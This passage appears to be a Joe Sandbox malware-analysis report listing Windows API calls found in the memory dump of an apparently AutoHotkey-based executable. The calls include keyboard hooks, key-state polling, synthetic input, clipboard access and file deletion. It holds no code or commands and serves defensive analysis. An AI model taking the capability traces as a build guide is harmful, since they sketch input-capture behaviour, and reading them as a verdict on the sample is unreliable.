      • Part of subcall function 0040D090: GetAsyncKeyState.USER32(0000005B), ref: 0040D149
      • Part of subcall function 0040D090: GetAsyncKeyState.USER32(0000005C), ref: 0040D15A
      • Part of subcall function 0040D090: GetAsyncKeyState.USER32(000000A0), ref: 0040D1DD
      • Part of subcall function 0040D090: GetAsyncKeyState.USER32(000000A1), ref: 0040D1F0
      • Part of subcall function 0040D090: GetAsyncKeyState.USER32(000000A2), ref: 0040D204
      • Part of subcall function 0040D090: GetAsyncKeyState.USER32(000000A3), ref: 0040D218
      • Part of subcall function 0040D090: GetAsyncKeyState.USER32(000000A4), ref: 0040D22C
      • Part of subcall function 0040D090: GetAsyncKeyState.USER32(000000A5), ref: 0040D240
      • Part of subcall function 0040D090: GetAsyncKeyState.USER32(0000005B), ref: 0040D251
      • Part of subcall function 0040D090: GetAsyncKeyState.USER32(0000005C), ref: 0040D262
      • Part of subcall function 0040D090: SendInput.USER32(00000002,?,0000001C), ref: 0040D4C7
    • PostMessageA.USER32(?,00000102,00000000,00000000), ref: 0040E216
      • Part of subcall function 00411DB0: VkKeyScanExA.USER32(00000000,00000000), ref: 00411DB9
      • Part of subcall function 0040E650: GetTickCount.KERNEL32 ref: 0040E6A8
      • Part of subcall function 0040E650: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 0040E6CB
      • Part of subcall function 0040E650: GetTickCount.KERNEL32(?,00000000), ref: 0040E6F5
      • Part of subcall function 0040E650: GetAsyncKeyState.USER32(000000A0), ref: 0040E734
      • Part of subcall function 0040E650: GetAsyncKeyState.USER32(000000A1), ref: 0040E747
      • Part of subcall function 0040E650: GetAsyncKeyState.USER32(000000A2), ref: 0040E75B
      • Part of subcall function 0040E650: GetAsyncKeyState.USER32(000000A3), ref: 0040E76F
      • Part of subcall function 0040E650: GetAsyncKeyState.USER32(000000A4), ref: 0040E783
      • Part of subcall function 0040E650: GetAsyncKeyState.USER32(000000A5), ref: 0040E797
      • Part of subcall function 0040E650: GetAsyncKeyState.USER32(0000005B), ref: 0040E7A8
      • Part of subcall function 0040E650: GetAsyncKeyState.USER32(0000005C), ref: 0040E7B9
      • Part of subcall function 0040E650: GetAsyncKeyState.USER32(000000A0), ref: 0040E8DE
      • Part of subcall function 0040E650: GetAsyncKeyState.USER32(000000A1), ref: 0040E8F1
      • Part of subcall function 0040E650: GetAsyncKeyState.USER32(000000A2), ref: 0040E905
      • Part of subcall function 0040E650: GetAsyncKeyState.USER32(000000A3), ref: 0040E919
      • Part of subcall function 0040E650: GetAsyncKeyState.USER32(000000A4), ref: 0040E92D
      • Part of subcall function 0040E650: GetAsyncKeyState.USER32(000000A5), ref: 0040E941
      • Part of subcall function 0040E650: GetAsyncKeyState.USER32(0000005B), ref: 0040E952
      • Part of subcall function 0040E650: GetAsyncKeyState.USER32(0000005C), ref: 0040E963
      • Part of subcall function 0040E9F0: __itow.LIBCMT ref: 0040EA0E
      • Part of subcall function 0040E9F0: GetTickCount.KERNEL32(?,?,00000000,?,?,?), ref: 0040EA39
      • Part of subcall function 0040E9F0: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 0040EA5C
      • Part of subcall function 0040E9F0: GetTickCount.KERNEL32(?,00000000,?,?,?), ref: 0040EA81
      • Part of subcall function 00410820: SendInput.USER32(00000000,00000000,0000001C), ref: 00410880
      • Part of subcall function 00410820: GetForegroundWindow.USER32 ref: 004108C3
      • Part of subcall function 00410820: SetWindowsHookExA.USER32(00000001,0040EC50,00400000,00000000), ref: 00410900
      • Part of subcall function 004847B8: HeapFree.KERNEL32(00000000,00000000), ref: 004847CE
      • Part of subcall function 004847B8: GetLastError.KERNEL32(00000000,?,00488A13,00000000,?,0048A041,00000100,004719BE), ref: 004847E0
    • GetTickCount.KERNEL32 ref: 0040E31E
    • GetAsyncKeyState.USER32(000000A0), ref: 0040E38C
    • GetAsyncKeyState.USER32(000000A1), ref: 0040E39F
    • GetAsyncKeyState.USER32(000000A2), ref: 0040E3B3
    • GetAsyncKeyState.USER32(000000A3), ref: 0040E3C7
    • GetAsyncKeyState.USER32(000000A4), ref: 0040E3DB
    • GetAsyncKeyState.USER32(000000A5), ref: 0040E3EF
    • GetAsyncKeyState.USER32(0000005B), ref: 0040E400
    • GetAsyncKeyState.USER32(0000005C), ref: 0040E411
      • Part of subcall function 00410D40: GetWindowThreadProcessId.USER32(?,00000000), ref: 00411409
    • GetKeyState.USER32(00000014), ref: 0040E4B1
    • GetKeyState.USER32(00000014), ref: 0040E4B9
      • Part of subcall function 0040EEC0: GetCurrentThreadId.KERNEL32(?,?,?), ref: 0040EEEC
      • Part of subcall function 0040EEC0: GetKeyboardState.USER32(?), ref: 0040EFB6
      • Part of subcall function 0040EEC0: SetKeyboardState.USER32(?), ref: 0040F055
      • Part of subcall function 0040EEC0: PostMessageA.USER32(00000000,00000100,00000000,?), ref: 0040F081
      • Part of subcall function 0040EEC0: PostMessageA.USER32(00000000,00000101,00000000,?), ref: 0040F0BE
      • Part of subcall function 0040EEC0: GetModuleHandleA.KERNEL32(user32,BlockInput), ref: 0040F10E
      • Part of subcall function 0040EEC0: GetProcAddress.KERNEL32(00000000), ref: 0040F115
      • Part of subcall function 0040EEC0: GetForegroundWindow.USER32 ref: 0040F189
      • Part of subcall function 0040EEC0: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0040F196
      • Part of subcall function 0040EEC0: GetKeyboardLayout.USER32(00000000), ref: 0040F1A1
      • Part of subcall function 0040EEC0: GetAsyncKeyState.USER32 ref: 0040F1CC
      • Part of subcall function 0040EEC0: keybd_event.USER32(00000000,?,?,00000000), ref: 0040F297
      • Part of subcall function 0040EEC0: GetAsyncKeyState.USER32(?), ref: 0040F2E2
      • Part of subcall function 0040EEC0: keybd_event.USER32(00000000,?,00000002,00000000), ref: 0040F3C2
      • Part of subcall function 0040EEC0: GetAsyncKeyState.USER32(?), ref: 0040F3FD
      • Part of subcall function 0040EEC0: GetModuleHandleA.KERNEL32(user32,BlockInput), ref: 0040F476
      • Part of subcall function 0040EEC0: GetProcAddress.KERNEL32(00000000), ref: 0040F47D
    • GetForegroundWindow.USER32 ref: 0040E4ED
    • GetWindowThreadProcessId.USER32(00000000), ref: 0040E4F4
    • AttachThreadInput.USER32(00000E10,?,00000000), ref: 0040E529
    • GetModuleHandleA.KERNEL32(user32,BlockInput), ref: 0040E552
    • GetProcAddress.KERNEL32(00000000), ref: 0040E559
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • SetWindowTextA.USER32(?,?), ref: 00462A2C
    • IsZoomed.USER32 ref: 00462A50
    • IsIconic.USER32(?), ref: 00462A60
    • __Stoull.NTSTC_LIBCMT ref: 00462AED
      • Part of subcall function 00485220: __mbsnbicmp_l.LIBCMT ref: 00485230
    • __Stoull.NTSTC_LIBCMT ref: 00462B14
    • __Stoull.NTSTC_LIBCMT ref: 00462B43
    • __Stoull.NTSTC_LIBCMT ref: 00462B69
    • __Stoull.NTSTC_LIBCMT ref: 00462B93
    • __Stoull.NTSTC_LIBCMT ref: 00462BB9
    • __Stoull.NTSTC_LIBCMT ref: 00462BE3
    • __Stoull.NTSTC_LIBCMT ref: 00462C10
    • __Stoull.NTSTC_LIBCMT ref: 00462C53
    • MulDiv.KERNEL32(00000000,00000060,00000060), ref: 00462CD0
    • MulDiv.KERNEL32(00000000,00000060,00000060), ref: 00462CF5
    • ShowWindow.USER32(?,00000000), ref: 00462D56
    • IsIconic.USER32(?), ref: 00462D65
    • GetWindowLongA.USER32(?,000000F0), ref: 00462DB2
    • GetWindowRect.USER32(?,?), ref: 00462DC7
    • MapWindowPoints.USER32(00000000,00000018,?,00000002), ref: 00462DDA
    • GetWindowLongA.USER32(?,000000F0), ref: 00462E2F
    • GetWindowRect.USER32(?,?), ref: 00462E49
    • GetWindowLongA.USER32(?,000000F0), ref: 00462ED2
    • GetWindowRect.USER32(?,?), ref: 00462EE8
    • GetClientRect.USER32(?,?), ref: 00462F07
    • IsWindowVisible.USER32(?), ref: 00462F91
    • GetWindowLongA.USER32(?,000000F0), ref: 00462FCC
    • GetWindowLongA.USER32(?,000000EC), ref: 00462FD6
    • GetMenu.USER32(?), ref: 00462FDD
    • AdjustWindowRectEx.USER32(?,00000000,00000000), ref: 00462FF0
    • GetSystemMetrics.USER32(00000003), ref: 00463010
    • GetSystemMetrics.USER32(00000002), ref: 00463022
    • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00463035
    • GetWindowRect.USER32(?,?), ref: 004630AE
    • IsZoomed.USER32(?), ref: 004630F0
    • ShowWindow.USER32(?,00000009), ref: 00463100
    • MoveWindow.USER32(?,80000001,?,?,?,?), ref: 0046312E
    • GetWindowRect.USER32(?,?), ref: 0046314D
    • GetClientRect.USER32(?,?), ref: 0046315F
    • ShowWindow.USER32(?,?), ref: 00463239
    • GetAncestor.USER32(?,00000002), ref: 00463261
    • GetForegroundWindow.USER32 ref: 00463273
    • SetFocus.USER32(?), ref: 0046330E
      • Part of subcall function 00475520: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0047553B
      • Part of subcall function 00475520: GetForegroundWindow.USER32 ref: 0047555A
      • Part of subcall function 00475520: FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 0047556C
      • Part of subcall function 00475520: IsIconic.USER32(00000000), ref: 00475583
      • Part of subcall function 00475520: ShowWindow.USER32(00000000,00000009), ref: 00475590
      • Part of subcall function 00475520: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004755C1
      • Part of subcall function 00475520: AttachThreadInput.USER32(00000E10,00000000,00000001), ref: 004755E7
      • Part of subcall function 00475520: AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00475600
      • Part of subcall function 00475520: SetForegroundWindow.USER32(00000000), ref: 00475621
      • Part of subcall function 00475520: GetForegroundWindow.USER32 ref: 00475643
      • Part of subcall function 00475520: GetWindow.USER32(00000000,00000004), ref: 0047565A
      • Part of subcall function 00475520: AttachThreadInput.USER32(00000E10,?,00000000), ref: 004756BE
      • Part of subcall function 00475520: AttachThreadInput.USER32(?,?,00000000), ref: 004756D7
      • Part of subcall function 00475520: BringWindowToTop.USER32(00000000), ref: 004756E2
    • GetFocus.USER32 ref: 00463298
    • GetDlgCtrlID.USER32(00000000), ref: 004632B4
    • GetParent.USER32(00000000), ref: 004632BF
    • GetDlgCtrlID.USER32(00000000), ref: 004632CC
    • UpdateWindow.USER32(00000013), ref: 004632FA
      • Part of subcall function 004669E0: SendMessageA.USER32(?,0000130B,00000000,00000000), ref: 004669FD
      • Part of subcall function 004669E0: GetWindowLongA.USER32(?,000000F0), ref: 00466A12
      • Part of subcall function 004669E0: IsWindowVisible.USER32(?), ref: 00466A33
      • Part of subcall function 004669E0: IsIconic.USER32(?), ref: 00466A46
      • Part of subcall function 004669E0: GetFocus.USER32 ref: 00466A7A
      • Part of subcall function 004669E0: GetWindowRect.USER32(?,?), ref: 00466AAA
      • Part of subcall function 004669E0: SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 00466AC2
      • Part of subcall function 004669E0: GetWindowLongA.USER32(?,000000F0), ref: 00466B4D
      • Part of subcall function 004669E0: ShowWindow.USER32(00000000,00000000), ref: 00466B80
      • Part of subcall function 004669E0: EnableWindow.USER32(?,00000001), ref: 00466B94
      • Part of subcall function 004669E0: EnableWindow.USER32(00000000,00000000), ref: 00466BA5
      • Part of subcall function 004669E0: GetWindowRect.USER32(?,?), ref: 00466BB9
      • Part of subcall function 004669E0: PtInRect.USER32(?,?,?), ref: 00466BD4
      • Part of subcall function 004669E0: PtInRect.USER32(?,?,?), ref: 00466BE9
      • Part of subcall function 004669E0: SetFocus.USER32(00000000), ref: 00466C2B
      • Part of subcall function 004669E0: SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 00466C6F
      • Part of subcall function 004669E0: SetFocus.USER32(00000000), ref: 00466C7C
      • Part of subcall function 004669E0: InvalidateRect.USER32(?,00000000,00000001), ref: 00466C95
      • Part of subcall function 004669E0: MapWindowPoints.USER32(00000000,?,?,00000002), ref: 00466CB1
      • Part of subcall function 004669E0: InvalidateRect.USER32(?,?,00000001), ref: 00466CC2
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00408970: CreateThread.KERNEL32(00000000,00002000,00408C80,00000000,00000000,004A9108), ref: 004089CA
      • Part of subcall function 00408970: SetThreadPriority.KERNEL32(00000000,0000000F), ref: 004089E0
      • Part of subcall function 00408970: PostThreadMessageA.USER32(00000000,00000417,?,00000000), ref: 00408A04
      • Part of subcall function 00408970: Sleep.KERNEL32(0000000A), ref: 00408A10
      • Part of subcall function 00408970: GetTickCount.KERNEL32 ref: 00408A27
      • Part of subcall function 00408970: PeekMessageA.USER32(?,00000000,00000417,00000417,00000001), ref: 00408A4A
      • Part of subcall function 00408970: CreateMutexA.KERNEL32(00000000,00000000,AHK Keybd), ref: 00408AC5
      • Part of subcall function 00408970: GetExitCodeThread.KERNEL32(00000000,?), ref: 00408ADA
      • Part of subcall function 00408970: GetTickCount.KERNEL32 ref: 00408AEA
      • Part of subcall function 00408970: Sleep.KERNEL32(00000000), ref: 00408AF7
      • Part of subcall function 00408970: CloseHandle.KERNEL32(00000000), ref: 00408B0F
      • Part of subcall function 00408970: CloseHandle.KERNEL32(00000000), ref: 00408B2F
      • Part of subcall function 00408970: CreateMutexA.KERNEL32(00000000,00000000,AHK Mouse), ref: 00408B54
      • Part of subcall function 00408970: CloseHandle.KERNEL32(00000000), ref: 00408B6B
    • Shell_NotifyIcon.SHELL32(00000002,004AC3F6), ref: 00414C89
    • IsWindow.USER32(00000000), ref: 00414CA7
    • DestroyWindow.USER32(00000000), ref: 00414CB4
    • DeleteObject.GDI32(00000000), ref: 00414CC2
    • DeleteObject.GDI32(00000000), ref: 00414CCC
    • DeleteObject.GDI32(00000000), ref: 00414CD6
    • DeleteObject.GDI32(00000000), ref: 00414CFD
    • DestroyCursor.USER32(00000000), ref: 00414D01
    • IsWindow.USER32(00000000), ref: 00414D0B
    • DestroyWindow.USER32(00000000), ref: 00414D19
    • DeleteObject.GDI32(00000000), ref: 00414D27
    • DeleteObject.GDI32(00000000), ref: 00414D31
    • DeleteObject.GDI32(00000000), ref: 00414D3B
    • DeleteObject.GDI32(?), ref: 00414D8F
    • DestroyCursor.USER32(00000000), ref: 00414DA7
    • DestroyCursor.USER32(00000000), ref: 00414DB0
    • IsWindow.USER32(00000000), ref: 00414DDE
    • DestroyWindow.USER32(00000000), ref: 00414DEB
    • DeleteObject.GDI32(00000000), ref: 00414E06
    • ChangeClipboardChain.USER32(000601DA,00000000), ref: 00414E4D
    • mciSendStringA.WINMM(status AHK_PlayMe mode,?,00000208,00000000), ref: 00414E7A
    • mciSendStringA.WINMM(close AHK_PlayMe,00000000,00000000,00000000), ref: 00414E8E
    • RtlDeleteCriticalSection.NTDLL(004A90F0), ref: 00414E95
    • OleUninitialize.OLE32 ref: 00414E9B
      • Part of subcall function 004847B8: HeapFree.KERNEL32(00000000,00000000), ref: 004847CE
      • Part of subcall function 004847B8: GetLastError.KERNEL32(00000000,?,00488A13,00000000,?,0048A041,00000100,004719BE), ref: 004847E0
      • Part of subcall function 00468B10: DeleteObject.GDI32(?), ref: 00468BA1
      • Part of subcall function 0045BFA0: SendMessageA.USER32(?,00000406,00000000,00000000), ref: 0045BFF3
      • Part of subcall function 0045BFA0: SendMessageA.USER32(?,00000414,00000000,00000000), ref: 0045C00C
      • Part of subcall function 0045BFA0: DestroyCursor.USER32(00000000), ref: 0045C013
      • Part of subcall function 0045BFA0: IsWindow.USER32(00000000), ref: 0045C022
      • Part of subcall function 0045BFA0: ShowWindow.USER32(00000000,00000000), ref: 0045C032
      • Part of subcall function 0045BFA0: SetMenu.USER32(00000000,00000000), ref: 0045C03E
      • Part of subcall function 0045BFA0: DestroyWindow.USER32(00000000), ref: 0045C058
      • Part of subcall function 0045BFA0: DeleteObject.GDI32(?), ref: 0045C09F
      • Part of subcall function 0045BFA0: DeleteObject.GDI32(?), ref: 0045C0B3
      • Part of subcall function 0045BFA0: DragFinish.SHELL32(?,?,004AA69C,77535F14,7619A747,00414D61,?,?,?,?,?,00000000,00000000), ref: 0045C0C7
      • Part of subcall function 0045BFA0: DestroyCursor.USER32(?), ref: 0045C0FB
      • Part of subcall function 0045BFA0: DeleteObject.GDI32(?), ref: 0045C103
      • Part of subcall function 0045BFA0: DestroyCursor.USER32(?), ref: 0045C17A
      • Part of subcall function 0045BFA0: DestroyCursor.USER32(?), ref: 0045C17D
      • Part of subcall function 0045BFA0: DestroyAcceleratorTable.USER32(?), ref: 0045C187
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • GetFullPathNameA.KERNEL32(004987E9,00000104,?,00000002,00000002), ref: 00451E20
    • GetFullPathNameA.KERNEL32(?,00000104,?,?), ref: 00451E62
    • GetFileAttributesA.KERNEL32(?), ref: 00451E99
    • GetFileAttributesA.KERNEL32(?), ref: 00451ED1
    • FindFirstFileA.KERNEL32(?,?), ref: 00451F0A
    • GetLastError.KERNEL32 ref: 00451F19
    • __wsplitpath.LIBCMT ref: 00451F67
      • Part of subcall function 004876F2: __splitpath_helper.LIBCMT ref: 00487734
      • Part of subcall function 004719A0: _vswprintf_s.LIBCMT ref: 004719B9
    • GetTickCount.KERNEL32 ref: 00451FB0
    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00451FD7
    • GetTickCount.KERNEL32 ref: 00451FED
      • Part of subcall function 00452140: __wsplitpath.LIBCMT ref: 00452199
      • Part of subcall function 00452140: __wsplitpath.LIBCMT ref: 004521BF
    • MoveFileA.KERNEL32(?,?), ref: 00452082
    • DeleteFileA.KERNEL32(?), ref: 0045209D
    • MoveFileA.KERNEL32(?,?), ref: 004520B7
    • GetLastError.KERNEL32 ref: 004520C1
    • CopyFileA.KERNEL32(?,?,00000000), ref: 004520EB
    • GetLastError.KERNEL32 ref: 004520F5
    • FindNextFileA.KERNEL32(?,00000010), ref: 0045210E
    • FindClose.KERNEL32(?), ref: 00452121
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • GetTickCount.KERNEL32 ref: 00404BB6
    • GetForegroundWindow.USER32 ref: 00404BE7
    • PostMessageA.USER32(000601DA,00000418,0000000C,00000000), ref: 00404C0C
    • GetKeyState.USER32(00000090), ref: 00404CC8
    • FindWindowA.USER32(#32771,00000000), ref: 00404E3E
    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00404E4B
    • GetCurrentThreadId.KERNEL32 ref: 00404E53
      • Part of subcall function 004066E0: PostMessageA.USER32(000601DA,00000400,?,?), ref: 004067A6
      • Part of subcall function 004066E0: PostMessageA.USER32(000601DA,00000400,?,?), ref: 004067DA
      • Part of subcall function 004066E0: PostMessageA.USER32(000601DA,00000401,00000000,?), ref: 004067F8
    • FindWindowA.USER32(#32768,00000000), ref: 0040503C
    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00405049
      • Part of subcall function 0040EEC0: GetCurrentThreadId.KERNEL32(?,?,?), ref: 0040EEEC
      • Part of subcall function 0040EEC0: GetKeyboardState.USER32(?), ref: 0040EFB6
      • Part of subcall function 0040EEC0: SetKeyboardState.USER32(?), ref: 0040F055
      • Part of subcall function 0040EEC0: PostMessageA.USER32(00000000,00000100,00000000,?), ref: 0040F081
      • Part of subcall function 0040EEC0: PostMessageA.USER32(00000000,00000101,00000000,?), ref: 0040F0BE
      • Part of subcall function 0040EEC0: GetModuleHandleA.KERNEL32(user32,BlockInput), ref: 0040F10E
      • Part of subcall function 0040EEC0: GetProcAddress.KERNEL32(00000000), ref: 0040F115
      • Part of subcall function 0040EEC0: GetForegroundWindow.USER32 ref: 0040F189
      • Part of subcall function 0040EEC0: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0040F196
      • Part of subcall function 0040EEC0: GetKeyboardLayout.USER32(00000000), ref: 0040F1A1
      • Part of subcall function 0040EEC0: GetAsyncKeyState.USER32 ref: 0040F1CC
      • Part of subcall function 0040EEC0: keybd_event.USER32(00000000,?,?,00000000), ref: 0040F297
      • Part of subcall function 0040EEC0: GetAsyncKeyState.USER32(?), ref: 0040F2E2
      • Part of subcall function 0040EEC0: keybd_event.USER32(00000000,?,00000002,00000000), ref: 0040F3C2
      • Part of subcall function 0040EEC0: GetAsyncKeyState.USER32(?), ref: 0040F3FD
      • Part of subcall function 0040EEC0: GetModuleHandleA.KERNEL32(user32,BlockInput), ref: 0040F476
      • Part of subcall function 0040EEC0: GetProcAddress.KERNEL32(00000000), ref: 0040F47D
      • Part of subcall function 00411930: GetForegroundWindow.USER32 ref: 00411930
      • Part of subcall function 00411930: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0041193D
      • Part of subcall function 00411930: GetKeyboardLayout.USER32(00000000), ref: 00411948
      • Part of subcall function 00411440: GetAsyncKeyState.USER32(000000A0), ref: 00411465
      • Part of subcall function 00411440: GetAsyncKeyState.USER32(000000A1), ref: 00411478
      • Part of subcall function 00411440: GetAsyncKeyState.USER32(000000A2), ref: 0041148C
      • Part of subcall function 00411440: GetAsyncKeyState.USER32(000000A3), ref: 004114A0
      • Part of subcall function 00411440: GetAsyncKeyState.USER32(000000A4), ref: 004114B4
      • Part of subcall function 00411440: GetAsyncKeyState.USER32(000000A5), ref: 004114C8
      • Part of subcall function 00411440: GetAsyncKeyState.USER32(0000005B), ref: 004114D9
      • Part of subcall function 00411440: GetAsyncKeyState.USER32(0000005C), ref: 004114EA
      • Part of subcall function 00406810: FindWindowA.USER32(#32771,00000000), ref: 00406983
      • Part of subcall function 00406810: GetForegroundWindow.USER32 ref: 004069C0
      • Part of subcall function 00406810: FindWindowA.USER32(#32771,00000000), ref: 00406A96
      • Part of subcall function 00406810: GetForegroundWindow.USER32 ref: 00406AD2
      • Part of subcall function 00406810: CallNextHookEx.USER32(?,?,?,?), ref: 00406C39
      • Part of subcall function 00406810: PostMessageA.USER32(000601DA,00000400,?,?), ref: 00406C69
      • Part of subcall function 00406810: PostMessageA.USER32(000601DA,00000400,00000000,?), ref: 00406C9E
      • Part of subcall function 00406810: PostMessageA.USER32(000601DA,00000401,7FFFFFFF,?), ref: 00406CBC
      • Part of subcall function 00407A20: GetTickCount.KERNEL32(?,004079A6,?,?,004068FA,?,?,?,00000000), ref: 00407A8D
      • Part of subcall function 00407A20: GetTickCount.KERNEL32(?,004079A6,?,?,004068FA,?,?,?,00000000), ref: 00407A9A
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • _strncmp.LIBCMT ref: 0047A45B
      • Part of subcall function 00479680: _strncmp.LIBCMT ref: 0047969E
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 0041F080: _strncpy.LIBCMT ref: 0041F0D2
      • Part of subcall function 0041F080: __Stoull.NTSTC_LIBCMT ref: 0041F14D
      • Part of subcall function 0041F080: __Stoull.NTSTC_LIBCMT ref: 0041F310
      • Part of subcall function 0041F080: __Stoull.NTSTC_LIBCMT ref: 0041F4B6
      • Part of subcall function 0041F080: __Stoull.NTSTC_LIBCMT ref: 0041F71A
      • Part of subcall function 0041F080: __Stoull.NTSTC_LIBCMT ref: 0041FC2B
      • Part of subcall function 0041F080: __Stoull.NTSTC_LIBCMT ref: 0041FFC1
      • Part of subcall function 0041F080: _strncpy.LIBCMT ref: 00420241
    • __Stoull.NTSTC_LIBCMT ref: 0043C220
      • Part of subcall function 00485220: __mbsnbicmp_l.LIBCMT ref: 00485230
      • Part of subcall function 00484959: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 0048499E
      • Part of subcall function 004042D0: GlobalAlloc.KERNEL32(00000002,00000001,00404294,?,?,?,?,00412B99,004987E9,00457210,?,00000000,036A0048), ref: 004042DE
      • Part of subcall function 004042D0: GlobalFix.KERNEL32(00000000), ref: 00404303
      • Part of subcall function 004042D0: GlobalFree.KERNEL32(00000000), ref: 00404314
      • Part of subcall function 00404250: _strncpy.LIBCMT ref: 004042A9
    • IsClipboardFormatAvailable.USER32(00000001), ref: 0043C823
    • IsClipboardFormatAvailable.USER32(0000000F), ref: 0043C82B
    • lstrcmpi.KERNEL32(?,00000000), ref: 0043C991
    • IsClipboardFormatAvailable.USER32(00000001), ref: 0043CA72
    • IsClipboardFormatAvailable.USER32(0000000F), ref: 0043CA7A
      • Part of subcall function 00404080: IsClipboardFormatAvailable.USER32(00000001), ref: 00404096
      • Part of subcall function 00404080: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040409C
      • Part of subcall function 00404080: GlobalUnWire.KERNEL32(00000000), ref: 0040410F
      • Part of subcall function 00404080: CloseClipboard.USER32 ref: 0040411B
      • Part of subcall function 00404080: GlobalFix.KERNEL32(00000000), ref: 00404136
      • Part of subcall function 00404080: DragQueryFile.SHELL32(00000000,000000FF,004987E9,00000000), ref: 00404194
      • Part of subcall function 00404080: DragQueryFile.SHELL32(00000000,00000000,00000000,00000000), ref: 004041BA
      • Part of subcall function 00404080: DragQueryFile.SHELL32(00000000,000000FF,004987E9,00000000), ref: 00404207
      • Part of subcall function 00404080: DragQueryFile.SHELL32(00000000,00000000,00000000,000003E7), ref: 0040422D
      • Part of subcall function 00404340: EmptyClipboard.USER32 ref: 00404364
      • Part of subcall function 00404340: GlobalUnWire.KERNEL32(00000000), ref: 0040437B
      • Part of subcall function 00404340: CloseClipboard.USER32 ref: 00404384
      • Part of subcall function 00404340: GlobalUnWire.KERNEL32(00000000), ref: 004043C7
      • Part of subcall function 00404340: GlobalFree.KERNEL32(00000000), ref: 004043D8
      • Part of subcall function 00404340: GlobalUnWire.KERNEL32 ref: 004043EE
      • Part of subcall function 00404340: CloseClipboard.USER32 ref: 004043F3
      • Part of subcall function 00404340: SetClipboardData.USER32(?,00000000), ref: 00404412
      • Part of subcall function 00404340: GlobalUnWire.KERNEL32 ref: 0040442E
      • Part of subcall function 00404340: CloseClipboard.USER32 ref: 00404433
      • Part of subcall function 00412570: GetTickCount.KERNEL32(?,0043C47A), ref: 0041257F
      • Part of subcall function 004847B8: HeapFree.KERNEL32(00000000,00000000), ref: 004847CE
      • Part of subcall function 004847B8: GetLastError.KERNEL32(00000000,?,00488A13,00000000,?,0048A041,00000100,004719BE), ref: 004847E0
